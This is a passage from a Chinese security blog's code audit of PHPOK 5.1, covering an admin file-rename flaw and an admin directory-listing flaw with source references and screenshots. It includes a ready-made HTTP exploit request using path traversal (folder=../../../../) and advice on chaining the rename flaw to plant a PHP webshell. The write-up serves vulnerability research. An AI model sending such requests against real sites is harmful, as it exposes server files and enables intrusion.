class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7</span><br><span class="line">Cookie: PHPSESSION=ilc9ev2s0fv8rn9hckfh07hni3; XDEBUG_SESSION=PHPSTORM</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 0</span><br></pre></td></tr></table></figure></p>
<p><img src="http://static.zybuluo.com/Passer6y/1a2eynhxyhmmljm5z9ok36qx/image_1d4ijnk021ui812v11pc8fap1sb351.png" alt="image_1d4ijnk021ui812v11pc8fap1sb351.png-172kB"></p>
<h2 id="后台文件重命名"><a href="#后台文件重命名" class="headerlink" title="后台文件重命名"></a>后台文件重命名</h2><p>这种漏洞只能和其他洞打组合拳利用才能玩</p>
<p>framework/admin/tpl_control.php</p>
<p>182行：<br><img src="http://static.zybuluo.com/Passer6y/f3046swiq74ti2j1iy4bkx0u/image_1d4jrep0n147ufdpgr21k8md3a9.png" alt="image_1d4jrep0n147ufdpgr21k8md3a9.png-273.4kB"></p>
<p>跟进215行：<code>$this-&gt;lib(&#39;file&#39;)-&gt;mv($file,$newfile);</code></p>
<p>framework/libs/file.php 269行：<br><img src="http://static.zybuluo.com/Passer6y/w72a50ygueplfvt39s3gj3a4/image_1d4l6afmq17svv8q28m3ev1sih5r.png" alt="image_1d4l6afmq17svv8q28m3ev1sih5r.png-123.9kB"></p>
<p>利用条件比较多，得知道文件名，其次想拿shell的话，得想办法写入自己的shell,比如想办法写到缓存里或者其他的，然后把原本不能当php解析的改成php扩展名等等..</p>
<h2 id="后台列目录"><a href="#后台列目录" class="headerlink" title="后台列目录"></a>后台列目录</h2><p>framework/admin/appsys_control.php   358行 <code>filelist_f()</code></p>
<p><img src="http://static.zybuluo.com/Passer6y/0dffvgai9y9fd4cv0bozqgjl/image_1d4juou7p14v9nli1isr1u561ee51m.png" alt="image_1d4juou7p14v9nli1isr1u561ee51m.png-274.2kB"></p>
<p><code>$tpl_list = $this-&gt;lib(&#39;file&#39;)-&gt;ls($tpl_dir);</code> 388行</p>
<p>跟进：<br><img src="http://static.zybuluo.com/Passer6y/6vda01kdf6371cgnylfro3p3/image_1d4l6siej1ud37qu1ebv1fd11d1m9.png" alt="image_1d4l6siej1ud37qu1ebv1fd11d1m9.png-146.6kB"></p>
<p>至于id传入啥参数，可以根据这个<code>$rs = $this-&gt;model(&#39;tpl&#39;)-&gt;get_one($id);</code>根据路由跟进到：<code>framework/model/appsys.php</code> 117行：id对应着<code>_app</code>目录下的文件名</p>
<p><img src="http://static.zybuluo.com/Passer6y/nyc1cs1p2pcmesp9fw5rmvr5/image_1d4l7b4pd1d0186u17a8cm1ehsm.png" alt="image_1d4l7b4pd1d0186u17a8cm1ehsm.png-197.4kB"></p>
<p>exp：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">GET /admin.php?c=appsys&amp;f=filelist&amp;id=fav&amp;folder=../../../../ HTTP/1.1</span><br><span class="line">Host: phpok</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.8d Safari/537.36</span><br><span class="line">content-type: application/json</span><br><span class="line">Accept: application/json, text/javascript, */*; q=0.01</span><br><span class="line">PHPSESSION: ilc9ev2s0fv8rn9hckfh07hni3</span><br><span class="line">X-Requested-With: XMLHttpRequest</span><br><span class="line">request_type: ajax</span><br><span class="line">phpok_ajax: 1</span><br><span class="line">Referer: http://phpok/index.php?id=news&amp;cate=company</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7</span><br><span class="line">Cookie: PHPSESSION=ilc9ev2s0fv8rn9hckfh07hni3</span><br><span class="line">Connection: close</span><br></pre></td></tr></table></figure></p>
<p><img src="http://static.zybuluo.com/Passer6y/exb2sbtm64zn2dpmlgsx58xj/image_1d4l7d16r1aqq19ov1fn312vi10k023.png" alt="image_1d4l7d16r1aqq19ov1fn312vi10k023.png-177.9kB"></p>
<p>背锅的file文件：framework/libs/file.php…</p>
<p>能力有限,只能挖出这么些鸡肋洞，希望各位师傅多多指点~</p>

      
    </div>

    

    
    
    

	
    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Passer6y</li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="http://0day.design/2019/03/07/phpok 最新版（5.1） 审计/" title="phpok 最新版（5.1） 审计">http://0day.design/2019/03/07/phpok 最新版（5.1） 审计/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>true</li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Web/" rel="tag"><i class="fa fa-tag"></i> Web</a>
          
            <a href="/tags/代码审计/" rel="tag"><i class="fa fa-tag"></i> 代码审计</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/05/php反序列化原生类利用/" rel="next" title="php反序列化原生类利用">
                <i class="fa fa-chevron-left"></i> php反序列化原生类利用
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/25/Teaser CONFidence CTF 2019 WriteUp/" rel="prev" title="Teaser CONFidence CTF 2019 WriteUp">
                Teaser CONFidence CTF 2019 WriteUp <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/21.jpg"
                alt="Passer6y" />
            
              <p class="site-author-name" itemprop="name">Passer6y</p>
              <p class="site-description motion-element" itemprop="description">A salty fish</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives">
                
                    <span class="site-state-item-count">37</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">4</span>
                    <span class="site-state-item-name">categories</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">12</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  <a href="https://github.com/passer6y" target="_blank" title="GitHub"><i class="fa fa-fw fa-github"></i>GitHub</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="mailto:passer6y@d0g3.cn" target="_blank" title="E-Mail"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  
                </span>
              
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://hpdoger.cn/" title="Hpdoger" target="_blank">Hpdoger</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://Hu3sky.github.io" title="Hu3sky" target="_blank">Hu3sky</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.0akarma.com/" title="0akarma" target="_blank">0akarma</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/H4lo" title="H4lo" target="_blank">H4lo</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/P1g3/" title="P1g3" target="_blank">P1g3</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://patrilic.top/" title="Patrilic" target="_blank">Patrilic</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://ph0rse.me/" title="Ph0rse" target="_blank">Ph0rse</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#基本分析"><span class="nav-number">1.</span> <span class="nav-text">基本分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#变量覆盖"><span class="nav-number">2.</span> <span class="nav-text">变量覆盖</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#后台任意文件读取"><span class="nav-number">3.</span> <span class="nav-text">后台任意文件读取</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#后台任意文件写入getshell"><span class="nav-number">4.</span> <span class="nav-text">后台任意文件写入getshell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#后台任意文件删除"><span class="nav-number">5.</span> <span class="nav-text">后台任意文件删除</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#后台文件重命名"><span class="nav-number">6.</span> <span class="nav-text">后台文件重命名</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#后台列目录"><span class="nav-number">7.</span> <span class="nav-text">后台列目录</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; 2017 &mdash; <span itemprop="copyrightYear">2020</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Passer6y</span>

  

  
</div>









<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共73.7k字</span>
</div>

<span id="busuanzi_container_site_pv" class="theme-info">
&nbsp;&nbsp;|&nbsp;&nbsp;本站总访问量<span id="busuanzi_value_site_pv"></span>次
  </span>
  <span id="busuanzi_container_site_uv" class="theme-info">
&nbsp;&nbsp;|&nbsp;&nbsp;本站访客数<span id="busuanzi_value_site_uv"></span>人次
  </span>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>
























  



  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="//cdn.jsdelivr.net/gh/theme-next/theme-next-reading-progress@1/reading_progress.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.3.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  



	





  





  








  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  
  
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(function (item) {
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: true,
        notify: false,
        appId: '3Jm4JutlBzR7fb3fxICb50pS-gzGzoHsz',
        appKey: 'TDRlM3HCI03SteHoOtVxJIMS',
        placeholder: 'Just go go',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>




  
  
  
  <link rel="stylesheet" href="/lib/algolia-instant-search/instantsearch.min.css">

  
  
  <script src="/lib/algolia-instant-search/instantsearch.min.js"></script>
  

  <script src="/js/src/algolia-search.js?v=6.3.0"></script>



  

  

  

  

  
  

  

  

  

  

  
  <style>
    .copy-btn {
      display: inline-block;
      padding: 6px 12px;
      font-size: 13px;
      font-weight: 700;
      line-height: 20px;
      color: #333;
      white-space: nowrap;
      vertical-align: middle;
      cursor: pointer;
      background-color: #eee;
      background-image: linear-gradient(#fcfcfc, #eee);
      border: 1px solid #d5d5d5;
      border-radius: 3px;
      user-select: none;
      outline: 0;
    }

    .highlight-wrap .copy-btn {
      transition: opacity .3s ease-in-out;
      opacity: 0;
      padding: 2px 6px;
      position: absolute;
      right: 4px;
      top: 8px;
    }

    .highlight-wrap:hover .copy-btn,
    .highlight-wrap .copy-btn:focus {
      opacity: 1
    }

    .highlight-wrap {
      position: relative;
    }
  </style>
  <script>
    $('.highlight').each(function (i, e) {
      var $wrap = $('<div>').addClass('highlight-wrap')
      $(e).after($wrap)
      $wrap.append($('<button>').addClass('copy-btn').append('Copy').on('click', function (e) {
        var code = $(this).parent().find('.code').find('.line').map(function (i, e) {
          return $(e).text()
        }).toArray().join('\n')
        var ta = document.createElement('textarea')
        document.body.appendChild(ta)
        ta.style.position = 'absolute'
        ta.style.top = '0px'
        ta.style.left = '0px'
        ta.value = code
        ta.select()
        ta.focus()
        var result = document.execCommand('copy')
        document.body.removeChild(ta)
        
          if(result)$(this).text('Copied')
          else $(this).text('Copy failed')
        
        $(this).blur()
      })).on('mouseleave', function (e) {
        var $b = $(this).find('.copy-btn')
        setTimeout(function () {
          $b.text('Copy')
        }, 300)
      }).append(e)
    })
  </script>


</body>
</html>
